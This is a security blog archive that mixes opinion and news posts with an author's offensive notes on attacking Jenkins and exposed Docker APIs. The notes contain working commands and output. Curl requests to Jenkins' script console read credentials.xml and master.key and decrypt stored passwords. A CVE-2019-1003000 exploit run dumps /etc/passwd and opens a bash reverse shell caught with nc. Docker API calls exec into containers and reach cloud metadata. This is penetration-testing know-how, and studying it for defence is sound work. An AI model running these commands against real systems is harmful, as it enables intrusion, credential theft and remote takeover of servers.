Category Archives: devops

Creating Meaningful Diversity of Thought in the Cybersecurity Workforce

The other day, I learned something that great French winemakers have known for centuries: It is often difficult to make a complex wine from just one variety of grape. It is easier to blend the juice from several grapes to achieve the structure and nuance necessary to truly delight the palate.

We are similarly relearning that building diversity into the cybersecurity workforce allows us to more easily tackle a wider range of problems and get to better, faster solutions.

Essential New Facets of Diversity

I don’t want to strain the metaphor too much, but we can certainly learn from our winemaking friends. Just as they search for juice with attributes such as structure, fruitiness and acidity, we search for ways to add the personal attributes that will be accretive to the problem-solving prowess and design genius of our teams. One of my personal quests has been to add the right mix of business skills to the technical teams I have had the honor to lead.

On my personal best practice adoption tour, I have made many familiar stops. I learned and then taught Philip Crosby’s Total Quality Management system and fretted about our company’s whole-product marketing mastery in the ’90s (thank you, Geoffrey Moore, author of “Crossing the Chasm”). Over the last 15 years, I implemented ITIL, lean principles and agile development (see the “Manifesto for Agile Software Development”), applied core and context thinking (“Dealing with Darwin”) to help my teams establish skill set development plans, and used horizon planning (introduced in “The Alchemy of Growth” by Baghai, Coley and White) to assign budget.

Throughout this journey, I kept trying to add the best practices that were intended for development, manufacturing and marketing to the mix. I was just not content to “stay in my lane.” I did this because I believe that speaking the language of development, manufacturing and marketing — aka the language of business — is essential for technology and security.

Innovation and the Language of Business

As a security evangelist, I have long advocated that chief information security officers (CISOs) must learn how to be relevant to the business and fluent in the language of business. A side benefit I did not fully explore at the time was how much the diversity of thought helped me in problem-solving.

We have been discovering the value of diversity of thought through programs such as IBM’s new collar initiative and the San Diego Cyber Center of Excellence (CCOE)’s Internship and Apprenticeship Programs. IBM’s initiative and the CCOE’s program rethink recruiting to pull workers into cybersecurity from adjacent disciplines, not just adjacent fields.

Toward the end of my stay at Intuit, I participated in a pilot program that brought innovation catalyst training to leaders outside of product development. Innovation catalysts teach the use of design thinking to deliver what the customer truly wants in a product. While learning the techniques I would later use to coach my teams and tease out well-designed services — services that would delight our internal customers — I was struck by an observation: People of different job disciplines didn’t just solve problems in different ways, they brought different values and valued different outcomes.

So, another form of diversity we should not leave out is the diversity of values derived from different work histories and job functions. We know that elegant, delightful systems that are socially and culturally relevant, and that respect our time, our training and the job we are trying to do, will have a higher adoption rate. We struggle with how to develop these systems with built-in security because we know that bolted-on security has too many seams to ever be secure.

To achieve built-in security, we’ve tried to embed security people in development and DevOps processes, but we quickly run out of security people. We try to supplement with security-minded employees, advocates and evangelists, but no matter how many people we throw at the problem, we are all like Sisyphus, trying to push an ever-bigger rock up an ever-bigger hill.

The Value of Inherently Secure Products

The problem, I think, is that we have not learned how to effectively incorporate the personal value and social value of inherently secure products. We think “make it secure too” instead of “make it secure first.” When I think about the design teams I’ve worked with as I was taking the catalyst training, the very first focus was on deep customer empathy — ultimate empathy for the job the customer is trying to do with our product or service.

People want the products they use to be secure; they expect it, they demand it. But we make it so difficult for them to act securely, and they become helpless. Helpless people do not feel empowered to act safely, they become resigned to being hacked, impersonated or robbed.

The kind of thinking I am advocating for — deep empathy for the users of the products and services we sell and deploy — has led to what I believe, and studies such as IBM’s “Future of Identity Study” bear out, is the imminent elimination of the password. No matter how hard we try, we are not going to get significantly better password management. Managing 100-plus passwords will never be easy. Not having a password is easy, at least for the customer.

We have to create a new ecosystem for authentication, including approaches such as the intelligent authentication that IAmI provides. Creating this new ecosystem gives us an opportunity to delight the customer. Writing rules about what kinds of passwords one can use and creating policies to enforce the rules only delights auditors and regulators. I won’t say we lack the empathy gene, but our empathy is clearly misplaced.

Variety Is the Spice of the Cybersecurity Workforce

As we strive to create products and services that are inherently secure — aka secure by design — let’s add the diversity of approach, diversity of values and advocacy for deep customer empathy to the cybersecurity workforce diversity we are building. Coming back to my recent learning experience, I much prefer wines that were crafted by selecting grape attributes that delight the palate over ones that were easy to farm.

The post Creating Meaningful Diversity of Thought in the Cybersecurity Workforce appeared first on Security Intelligence.

Cyber war is here, according to 87% of security professionals

A study from Venafi has concluded that the world is in the midst of a cyber war, with 72% of respondents believing nation-states have right to ‘hack back’ cybercriminals. The

The post Cyber war is here, according to 87% of security professionals appeared first on The Cyber Security Place.

This Week in Security News: Security Vulnerabilities

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn what critical approaches can protect your enterprise business from software vulnerabilities. Also, learn about vulnerabilities in IoT alarms that let hackers hijack cars.

Read on:

How to get Ahead of Vulnerabilities and Protect your Enterprise Business

There are several critical approaches today’s businesses and IT teams can take to safeguard their organization from software vulnerabilities.


Researchers Find Critical Backdoor in Swiss Online Voting System

Researchers have found a severe issue in the new Swiss internet voting system that they say would let someone alter votes undetected. They say it should put a halt to Switzerland’s plan to roll out the system in real elections this year.

New SLUB Backdoor Uses GitHub, Communicates via Slack

Trend Micro recently came across a previously unknown malware that piqued interest in finding how the malware was spread via water hole attacks and was connecting to the slack Platform.

Navy, Industry Partners Are ‘Under Cyber Siege’ by Chinese Hackers, Review Asserts

The Navy and its industry partners are “under cyber siege” by Chinese hackers and others who have stolen national security secrets in recent years, exploiting critical weaknesses that threaten the U.S.’s standing as the world’s top military power. 

A Machine Learning Model to Detect Malware Variants

When malware is difficult to discover, Trend Micro proposes a machine learning model that uses adversarial autoencoder and semantic hashing to find what bad actors try to hide. 

Trend Micro: IoT Brings Innovation, But Also Threats

The growth of 5G and the Internet of Things may be helping to bring smarter and more connected experiences and services around the world, but may also be exposing users to more security worries.

Vulnerabilities in Smart Alarms Can Let Hackers Hijack Cars

Vulnerabilities in third-party car alarms managed via their mobile applications were uncovered and seem to affect around 3 million cars that use these “smart” internet-of-things (IoT) devices.

Facebook Sues Ukrainian Hackers Who Stole User Info Via Personality Quizzes

Facebook filed a lawsuit against two Ukrainian nationals who allegedly used personality quizzes to steal user information from 63,000 people between 2016 and 2018, mostly in Russia. 

StackStorm DevOps Software Vulnerability CVE-2019-9580 Allows Remote Code Execution

Popular open-source DevOps automation software StackStorm was reported to have a critical vulnerability that could allow remote attackers to perform arbitrary commands on targeted servers.

Do you think vulnerabilities in IoT car devices will decrease throughout the year? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Security Vulnerabilities appeared first on .

Application Security Has Nothing to Do With Luck

This St. Patrick’s Day is sure to bring all the usual trappings: shamrocks, the color green, leprechauns and pots of gold. But while we take a step back to celebrate Irish culture and the first signs of spring this year, the development cycle never stops. Think of a safe, secure product and a confident, satisfied customer base as the pot of gold at the end of your release rainbow. To get there, you’ll need to add application security to your delivery pipeline, but it’s got nothing to do with luck. Your success depends on your organizational culture.

It’s Time to Greenlight Application Security

Because security issues in applications have left so many feeling a little green, consumers now expect and demand security as a top priority. However, security efforts are often seen as red, as in a red stop light or stop sign. In others, they are seen as a cautious yellow at best. But what if security actually enabled you to go faster?

By adding application security early in the development cycle, developers can obtain critical feedback to resolve vulnerabilities in context when they first occur. This earlier resolution can actually reduce overall cycle times. In fact, a 2016 Puppet Labs survey found that “high performers spend 50 percent less time remediating security issues than low performers,” which the most recent edition attributed to the developers building “security into the software delivery cycle as opposed to retrofitting security at the end.” The 2018 study also noted that high-performing organizations were 24 times more likely to automate security configurations.

Go green this spring by making application security testing a part of your overall quality and risk management program, and soon you’ll be delivering faster, more stable and more secure applications to happier customers.

Build Your AppSec Shamrock

Many people I talk to today are working hard to find the perfect, balanced four-leaf clover of application modernization, digital transformation, cloud computing and big data to strike gold in the marketplace. New methodologies such as microservice architectures and new container-based delivery models create an ever-changing threat landscape, and it’s no wonder that security teams feel overwhelmed.

A recent Ponemon Institute study found that 88 percent of cybersecurity teams spend at least 25 hours per week investigating and detecting application vulnerabilities, and 83 percent spend at least that much time on remediation efforts. While it’s certainly necessary to have these teams in place to continuously investigate and remediate incidents, they should ideally focus on vulnerabilities that cannot be found by other means.

A strong presence in the software delivery life cycle will allow other teams to handle more of the common and easier-to-fix issues. For a start this St. Patrick’s Day, consider establishing an application security “shamrock” that includes:

  • Static application security testing (SAST) for developer source code changes;
  • Dynamic application security testing (DAST) for key integration stages and milestones; and
  • Open-source software (OSS) to identify vulnerabilities in third-party software.

You can enhance each of these elements by leveraging automation, intelligence and machine learning capabilities. Over time, you can implement additional testing capabilities, such as interactive application security testing (IAST), penetration testing and runtime application self-protection (RASP), for more advanced insight, detection and remediation.

Get Off to a Clean Start This Spring

In the Northern Hemisphere, St. Patrick’s Day comes near the start of spring, and what better time to think about new beginnings for your security program. Start by incorporating application security in your delivery pipeline early and often to more quickly identify and remediate vulnerabilities. Before long, you’ll find that your security team has much more time to deal with more critical flaws and incidents. With developers and security personnel working in tandem, the organization will be in a much better position to release high-quality applications that lead to greater consumer trust, lower risk and fewer breaches.

The post Application Security Has Nothing to Do With Luck appeared first on Security Intelligence.

Shifting Left Is a Lie… Sort of

It would be hard to be involved in technology in any way and not see the dramatic upward trend in DevOps adoption. In their January 2019 publication “Five Key Trends To Benchmark DevOps Progress,” Forrester research found that 56 percent of firms were ‘implementing, implemented or expanding’ DevOps. Further, 51 percent of adopters have embraced […]… Read More

The post Shifting Left Is a Lie… Sort of appeared first on The State of Security.

Jenkins – CVE-2018-1000600 PoC

second exploit from the blog post

Chained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRF

This affects the GitHub plugin that is installed by default. However, I learned that when you spin up a new jenkins instance it pulls all the updated plugins (also by default) I'm honestly not sure how often people set update to latest plugin on by default but it does seem to knock down some of this stuff.

exploit works against: GitHub Plugin up to and including 1.29.1

When i installed Jenkins today (25 Feb 19) it installed 1.29.4 by default thus the below does NOT work.

From the blog post:

CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials 
It can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this?(Or if someone know how to obtain credentials ID, please tell me!)
Although it can’t extract any credentials without known credentials ID, there is still another attack primitive - a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!

To get old versions of the plugin and info you can go to

download old versions

Five Easy Steps to Keep on Your Organization’s DevOps Security Checklist

The discovery of a significant container-based (runc) exploit sent shudders across the Internet. Exploitation of CVE-2019-5736 can be achieved with “minimal user interaction”; it subsequently allows attackers to gain root-level code execution on the host. Scary, to be sure. Scarier, however, is that the minimal user interaction was made easier by failure to follow a […]… Read More

The post Five Easy Steps to Keep on Your Organization’s DevOps Security Checklist appeared first on The State of Security.

Jenkins – messing with exploits pt3 – CVE-2019-1003000


This post covers the Orange Tsai Jenkins pre-auth exploit

Vuln versions: Jenkins < 2.137 (preauth)

Pipeline: Declarative Plugin up to and including 1.3.4
Pipeline: Groovy Plugin up to and including 2.61
Script Security Plugin up to and including 1.49  (in CG's testing 1.50 is also vuln)

The exploitdb link above lists a nice self contained exploit that will compile the jar for you and serve it up for retrieval by the vulnerable Jenkins server.

nc -l 8888 -vv

bash: no job control in this shell
 bash-3.2$ jenkins

After Jenkins 2.138 the preauth is gone but if you have  an overall read token and the plugins are still vulnerable you can still exploit that server.  You can just add your cookie to the script and it will hit the url with your authenticated cookie and you can still exploit the server.

Jenkins – Identify IP Addresses of nodes

While doing some research I found several posts on stackoverflow asking how to identify the IP address of nodes.  You might want to know this if you read the decrypting credentials post and managed to get yourself some ssh keys for nodes but you cant actually see the node's IP in the Jenkins UI.

Stackoverflow link:
blog on setting up a node:

 There are great answers in the stackoverflow post on using the script console but in the event you found yourself with just the Jenkins directory or no access to the script console it's pretty easy to get this information.

You can just browse to jenkins-ip/computer/$nodename/config.xml. This request will require the extended read permission.

Optionally if you are on the box  or have a backup you can go to jenkins-dir/nodes/$nodename/config.xml

Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners

Docker is a technology that allows you to perform operating system level virtualization. An incredible number of companies and production hosts are running Docker to develop, deploy and run applications inside containers.

You can interact with Docker via the terminal and also via remote API. The Docker remote API is a great way to control your remote Docker host, including automating the deployment process, control and get the state of your containers, and more. With this great power comes a great risk — if the control gets into the wrong hands, your entire network can be in danger.

In February, a new vulnerability (CVE-2019-5736) was discovered that allows you to gain host root access from a docker container.  The combination of this new vulnerability and exposed remote Docker API can lead to a fully compromised host.

According to Imperva research, exposed Docker remote API has already been taken advantage of by hundreds of attackers, including many using the compromised hosts to mine a lesser-known-albeit-rising cryptocurrency for their financial benefit.

In this post you will learn about:

  • Publicly exposed Docker hosts we found
  • The risk they can put organizations in
  • Protection methods

Publicly Accessible Docker Hosts

The Docker remote API listens on ports 2735 / 2736. By default, the remote API is only accessible from the loopback interface (“localhost”, “”), and should not be available from external sources. However, as with other cases —  for example, publically-accessible Redis servers such as RedisWannaMine —  sometimes organizations are misconfiguring their services, allowing easy access to their sensitive data.

We used the Shodan search engine to find open ports running Docker.

We found 3,822 Docker hosts with the remote API exposed publicly.

We wanted to see how many of these IPs are really exposed. In our research, we tried to connect to the IPs on port 2735 and list the Docker images. Out of 3,822 IPs, we found approximately 400 IPs are accessible.

Red indicates Docker images of crypto miners, while green shows production environments and legitimate services  

We found that most of the exposed Docker remote API IPs are running a cryptocurrency miner for a currency called Monero. Monero transactions are obfuscated, meaning it is nearly impossible to track the source, amount, or destination of a transaction.  

Other hosts were running what seemed to be production environments of MySQL database servers, Apache Tomcat, and others.

Hacking with the Docker Remote API

The possibilities for attackers after spawning a container on hacked Docker hosts are endless. Mining cryptocurrency is just one example. They can also be used to:

  • Launch more attacks with masked IPs
  • Create a botnet
  • Host services for phishing campaigns
  • Steal credentials and data
  • Pivot attacks to the internal network

Here are some script examples for the above attacks.

1. Access files on the Docker host and mounted volumes

By starting a new container and mounting it to a folder in the host, we got access to other files in the Docker host:

It is also possible to access data outside of the host by looking on container mounts. Using the Docker inspect command, you can find mounts to external storage such as NFS, S3 and more. If the mount has write access, you can also change the data.

2. Scan the internal network

When a container is created in one of the predefined Docker network “bridge” or “host,” attackers can use it to access hosts the Docker host can access within the internal network. We used nmap to scan the host network to find services. We did not need to install it, we simply used a ready image from the Docker Hub:

It is possible to find other open Docker ports and navigate inside the internal network by looking for more Docker hosts as described in our Redis WannaMine post.

3. Credentials leakage

It is very common to pass arguments to a container as environment variables, including credentials such as passwords. You can find examples of passwords sent as environment variables in the documentation of many Docker repositories.

We found 3 simple ways to detect credentials using the Docker remote API:

Docker inspect command

“env” command on a container

Docker inspect doesn’t return all environment variables. For example, it doesn’t return ones which were passed to docker run using the –env-file argument. Running “env” command on a container will return the entire list:

Credentials files on the host

Another option is mounting known credentials directories inside the host. For example, AWS credentials have a default location for CLI and other libraries and you can simply start a container with a mount to the known directory and access a credentials file like “~/.aws/credentials”.

4. Data Leakage

Here is an example of how a database and credentials can be detected, in order to run queries on a MySQL container:

Wrapping Up

In this post, we saw how dangerous exposing the Docker API publicly can be.

Exposing Docker ports can be useful, and may be required by third-party apps like ‘portainer’, a management UI for Docker.

However, you have to make sure to create security controls that allow only trusted sources to interact with the Docker API. See the Docker documentation on Securing Docker remote daemon.

Imperva is going to release a cloud discovery tool to better help IT, network and security administrators answer two important questions:

  • What do I have?
  • Is it secure?

The tool will be able to discover and detect publicly-accessible ports inside the AWS account(s). It will also scan both instances and containers. To try it, please contact Imperva sales.

We also saw how credentials stored as environment variables can be retrieved. It is very common and convenient, but far from being secure. Instead of using environment variables, it is possible to read the credentials on runtime (depends on your environment). In AWS you can use roles and KMS. In other environments, you can use 3rd party tools like Vault or credstash.

The post Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners appeared first on Blog.

Jenkins – decrypting credentials.xml

If you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:


passwd = hudson.util.Secret.decrypt(hashed_pw)

You need to perform this on the the Jenkins system itself as it's using the local master.key and hudson.util.Secret

Screenshot below

Code to get the credentials.xml from the script console


def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c type credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr"


def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cat credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr"

If you just want to do it with curl you can hit the scriptText endpoint and do something like this:


curl -u admin:admin --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

Also because this syntax took me a minute to figure out for files in subdirectories:

curl -u admin:admin --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+secrets%5C\master.key%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run


curl -u admin:admin --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

Then to decrypt any passwords:

curl -u admin:admin --data "script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())"

If you are in a position where you have the files but no access to jenkins you can use:

There is a small bug in the python when it does the regex and i havent bothered to fix it at the time of this post. But here is version where instead of the regex i'm just printing out the values and you can see the decrypted password. The change is line 55.

Edit 4 March 19: the script only regexs for password (line 72), you might need to swap out the regex if there are ssh keys or other the credentials.xml file :-)

Jenkins – SECURITY-200 / CVE-2015-5323 PoC

API tokens of other users available to admins

SECURITY-200 / CVE-2015-5323

API tokens of other users were exposed to admins by default. On instances that don’t implicitly grant RunScripts permission to admins, this allowed admins to run scripts with another user’s credentials.

Affected versions
All Jenkins main line releases up to and including 1.637

All Jenkins LTS releases up to and including 1.625.1

Tested against Jenkins 1.6.37

From the script console:
run some groovy code to get the token of another user

wrong token

correct token

Jenkins Master Post

A collection of posts on attacking Jenkins
Manipulating build steps to get RCE

Using the terminal plugin to get RCE

Getting started with Jenkins Plugins

Vulns in

  • Pipeline: Declarative Plugin up to and including 1.3.4
  • Pipeline: Groovy Plugin up to and including 2.61
  • Script Security Plugin up to and including 1.49
Blog post says: This issue has been fixed in Jenkins version 2.121.1 LTS (2.132 weekly).

CVE-2019-1003000 (
CVE-2015-8103 & CVE-2016-0792
CVE-2017-1000353 PoC
CVE-2018-1999002 (windows) Arbitrary file read

A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework. Under Windows, directories that don't exist can be traversed by ../, but not for Linux. Then this vulnerability can be read by any file under Windows. Under Linux, you need to have a directory with _ in the Jenkins plugins directory.
Decrypting credentials.xml

Jenkins, windows, powershell
CVE-2018-1999001 malformed request moves the config.xml file, after restart anyone can log in - couple it with a DoS (CVE-2018-1999043) to force restart 
  • Jenkins weekly up to and including 2.132
  • Jenkins LTS up to and including 2.121.1

CG Posts:
Username enumeration Jenkins 2.137 and below

Jenkins - SECURITY-200 / CVE-2015-5323 PoC (API tokens of other users available to admins)

Jenkins - SECURITY-180/CVE-2015-1814 PoC (Forced Token Change)
Decrypting Jenkins credentials.xml
Jenkins - CVE-2018-1000600 SSRF in GitHub plugin

Jenkins - CVE-2019-1003000 Pt 1
Jenkins - CVE-2019-1003000 Pt 2 - Orange Tsai exploit
Jenkins - Identify IP Addresses of nodes

Jenkins – messing with exploits pt2 – CVE-2019-1003000

After the release of Orange Tsai's exploit for Jenkins. I've been doing some poking. PreAuth RCE against Jenkins is something everyone wants.

While not totally related to the blog post and tweet the following exploit came up while searching.

What I have figured out that is important is the plug versions as it relates to these latest round of Jenkins exploits.  TBH I never paid much attention to the plugins in the past as the issues have been with core Jenkins (as was the first blog post) but you can get a look at them by going to jenkins-server/pluginManager/installed

Jenkins plugin manager
It does require admin permissions or you get this:

No permissions for Jenkins plugin manager

If you do have permissions you can also hit it with the jenkins-cli client and pull the info

$ java -jar jenkins-cli.jar -s -auth admin:admin list-plugins

jsch                               JSch dependency plugin                                           0.1.55
structs                            Structs Plugin                                                   1.17
apache-httpcomponents-client-4-api Apache HttpComponents Client 4.x API Plugin                      4.5.5-3.0
mailer                             Mailer Plugin                                                    1.23
command-launcher                   Command Agent Launcher Plugin                                    1.3
workflow-api                       Pipeline: API                                                    2.33
workflow-job                       Pipeline: Job                                                    2.31
ssh-credentials                    SSH Credentials Plugin                                           1.14
authentication-tokens              Authentication Tokens API Plugin                                 1.3
workflow-cps-global-lib            Pipeline: Shared Groovy Libraries                                2.13
jackson2-api                       Jackson 2 API Plugin                                             2.9.8
pipeline-stage-tags-metadata       Pipeline: Stage Tags Metadata                          
pipeline-milestone-step            Pipeline: Milestone Step                                         1.3.1
credentials                        Credentials Plugin                                               2.1.18
lockable-resources                 Lockable Resources plugin                                        2.4
jquery-detached                    JavaScript GUI Lib: jQuery bundles (jQuery and jQuery UI) plugin 1.2.1
workflow-scm-step                  Pipeline: SCM Step                                               2.7
matrix-auth                        Matrix Authorization Strategy Plugin                             2.3
matrix-project                     Matrix Project Plugin                                            1.13
pipeline-stage-step                Pipeline: Stage Step                                             2.3
pipeline-build-step                Pipeline: Build Step                                             2.7
pipeline-input-step                Pipeline: Input Step                                             2.9
bouncycastle-api                   bouncycastle API Plugin                                          2.17
handlebars                         JavaScript GUI Lib: Handlebars bundle plugin                     1.1.1
momentjs                           JavaScript GUI Lib: Moment.js bundle plugin                      1.1.1
plain-credentials                  Plain Credentials Plugin                                         1.5
docker-commons                     Docker Commons Plugin                                            1.13
git-client                         Git client plugin                                                2.7.6
pipeline-rest-api                  Pipeline: REST API Plugin                                        2.10
workflow-basic-steps               Pipeline: Basic Steps                                            2.14
credentials-binding                Credentials Binding Plugin                                       1.17 (1.18)
pipeline-stage-view                Pipeline: Stage View Plugin                                      2.10
workflow-multibranch               Pipeline: Multibranch                                            2.20
script-security                    Script Security Plugin                                           1.49 (1.53)
git-server                         GIT server Plugin                                                1.7
workflow-step-api                  Pipeline: Step API                                               2.19
pipeline-graph-analysis            Pipeline Graph Analysis Plugin                                   1.9
pipeline-model-api                 Pipeline: Model API                                    
workflow-cps                       Pipeline: Groovy                                                 2.61 (2.63)
branch-api                         Branch API Plugin                                                2.1.2
jdk-tool                           JDK Tool Plugin                                                  1.2
cloudbees-folder                   Folders Plugin                                                   6.7
durable-task                       Durable Task Plugin                                              1.29
junit                              JUnit Plugin                                                     1.27
scm-api                            SCM API Plugin                                                   2.3.0
ace-editor                         JavaScript GUI Lib: ACE Editor bundle plugin                     1.1
display-url-api                    Display URL API                                                  2.3.0
workflow-support                   Pipeline: Supporting APIs                                        3.2

AFAIK you cant enumerate plugins installed and their version without (elevated) authentication like you can with things like WordPress.  If you know how, please let me know.  For the time being i guess it's just throwing things to see what sticks.

As I mentioned, the latest particular vulns are issues with installed Jenkins plugins. Taking a look at CVE-2019-1003000 ( we can see that it affects the Script Security Plugin (the says 2.49 but it's a typo and should be 1.49) as seen on the Jenkins advisory

An exploit for the issue exists and is available here: it even comes with a docker config to spin up a vulnerable version to try it out on.  What's important about this particular exploit is that it IS post auth but it doesn't require script permissions, only Overall/Read permission and Job/Configure permissions.

I'm seeing more and more servers/admins (rightfully) block access to the scriptscriptText console because it's well documented that is an immediate RCE.
no script permission
I encourage you to read the whole readme file in the repo but the most important part is here:

A flaw was found in Pipeline: Declarative Plugin before version, Pipeline: Groovy Plugin before version 2.61.1 and Script Security Plugin before version 1.50
This PoC is using a user with Overall/Read and Job/Configure permission to execute a maliciously modified build script in sandbox mode, and try to bypass the sandbox mode limitation in order to run arbitrary scripts (in this case, we will execute system command).
As a background, Jenkins's pipeline build script is written in groovy. This build script will be compiled and executed in Jenkins master or node, containing definition of the pipeline, e.g. what to do in slave nodes. Jenkins also provide the script to be executed in sandbox mode. In sandbox mode, all dangerous functions are blacklisted, so regular user cannot do anything malicious to the Jenkins server.

Running the exploit:

 python2.7 --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "cat /etc/passwd"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY
[Pipeline] echo
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
jenkins:x:1000:1000:Linux User,,,:/var/jenkins_home:/bin/bash

[Pipeline] End of Pipeline

Finished: SUCCESS

you can certainly pull a reverse shell from it as well.

python2.7 --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "bash -i >& /dev/tcp/ 0>&1"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY

and you get:

nc -l 4444 -vv

bash: cannot set terminal process group (7): Not a tty

bash: no job control in this shell
bash-4.4$ whoami


The TLDR is you can use this exploit to get a shell if an older version of the Script Security Plugin is installed and if you have Overall/Read permission and Job/Configure permission which a regular Jenkins user is more inclined to have and  this exploit doesn't require using the script console.

Jenkins – messing with new exploits pt1

Jenkins notes for:

to download old jenkins WAR files

1st bug in the blog is a username enumeration bug in

  • Jenkins weekly up to and including 2.145
  • Jenkins LTS up to and including 2.138.1

From the blog:
Pre-auth User Information Leakage
While testing Jenkins, it’s a common scenario that you want to perform a brute-force attack but you don’t know which account you can try(a valid credential can read the source at least so it’s worth to be the first attempt).
In this situation, this vulnerability is useful!Due to the lack of permission check on search functionality. By modifying the keyword from a to z, an attacker can list all users on Jenkins! 




Even though the advisory says 2.138_1 i tested against 2.138 and the exploit doesn't work.

SOOOOO you are looking for Jenkins <= 2.137

If jenkins is really old the above should work and also where you can get the email address via similar query.
  • versions up to (including) 2.73.1
  • versions up to (including) 2.83

with 2.137 you can get username/id


Abusing Docker API | Socket

Notes on abusing open Docker sockets

This wont cover breaking out of docker containers

Ports: usually 2375 & 2376 but can be anything


Enable docker socket (Create practice locations)

Having the docker API | socket exposed is essentially granting root to any of the containers on the system

The daemon listens on unix:///var/run/docker.sock but you can bind Docker to another host/port or a Unix socket.

The docker socket  is the socket the Docker daemon listens on by default and it can be used to communicate with the daemon from within a container, or if configured, outside the container against the host running docker.

All the docker socket magic is happening via the docker API. For example if we wanted to spin up an nginx container we'd do the below:

Create a nginx container

The following command uses curl to send the {“Image”:”nginx”} payload to the /containers/create endpoint of the Docker daemon through the unix socket. This will create a container based on Nginx and return its ID.

$ curl -XPOST --unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create


Start the container

 $ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/start

As mentioned above you can also have the docker socket listen on a TCP port

You can validate it's docker by hitting it with a version request

 $ curl -s http://open.docker.socket:2375/version | jq


  "Version": "1.13.1",
  "ApiVersion": "1.26",
  "MinAPIVersion": "1.12",
  "GitCommit": "07f3374/1.13.1",
  "GoVersion": "go1.9.4",
  "Os": "linux",
  "Arch": "amd64",
  "KernelVersion": "3.10.0-514.26.2.el7.x86_64",
  "BuildTime": "2018-12-07T16:13:51.683697055+00:00",
  "PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64"

 or with the docker client

docker -H  open.docker.socket:2375 version


  Version:          1.13.1
  API version:      1.26 (minimum version 1.12)
  Go version:       go1.9.4
  Git commit:       07f3374/1.13.1
  Built:            Fri Dec  7 16:13:51 2018
  OS/Arch:          linux/amd64
  Experimental:     false

This is basically a shell into the container

Get a list of running containers with the ps command

docker -H  open.docker.socket:2375 ps

CONTAINER ID        IMAGE                                               COMMAND                  CREATED             STATUS              PORTS                                           NAMES

72cd30d28e5c        gogs/gogs                                           "/app/gogs/docker/st…"   5 days ago          Up 5 days >3000/tcp,>22/tcp   gogs
b522a9034b30        jdk1.8                                              "/bin/bash"              5 days ago          Up 5 days                                                           myjdk8
0f5947860c17        centos/mysql-57-centos7                             "container-entrypoin…"   8 days ago          Up 8 days >3306/tcp                          mysql
3965c004c7a7   "java -jar /app.jar"     8 days ago          Up 8 days >12000/tcp                        config
3f466b754971        42cb59080921                                        "/bin/bash"              8 days ago          Up 8 days                                                           jdk8
6499013fdc2d        registry                                            "/ /etc…"   8 days ago          Up 8 days >5000/tcp                          registry

Exec into one of the containers

docker -H  open.docker.socket:2375 exec -it mysql /bin/bash

bash-4.2$ whoami


Other commands

Are there some stopped containers?
docker -H open.docker.socket:2375 ps -a

What are the images pulled on the host machine?
docker -H open.docker.socket:2375 images

I've frequently not been able to get the docker client to work well when it comes to the exec command but you can still code exec in the container with the API.  The example below is using curl to interact with the API over https (if enabled). to create and exec job, set up the variable to receive the out put and then start the exec so you can get the output.

Using curl to hit the API

Sometimes you'll see 2376 up for the TLS endpoint.  I haven't been able to connect to it with the docker client but you can with curl no problem to hit the docker API.

Docker socket to metadata URL

Below is an example of hitting the internal AWS metadata URL and getting the output

list containers:

curl --insecure https://tls-opendocker.socker:2376/containers/json | jq
    "Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668",
    "Names": [
    "Image": "dotnetify",
    "ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca",
    "Command": "cmd /S /C 'dotnet netify-temp.dll'",
    "Created": 1541018555,
    "Ports": [
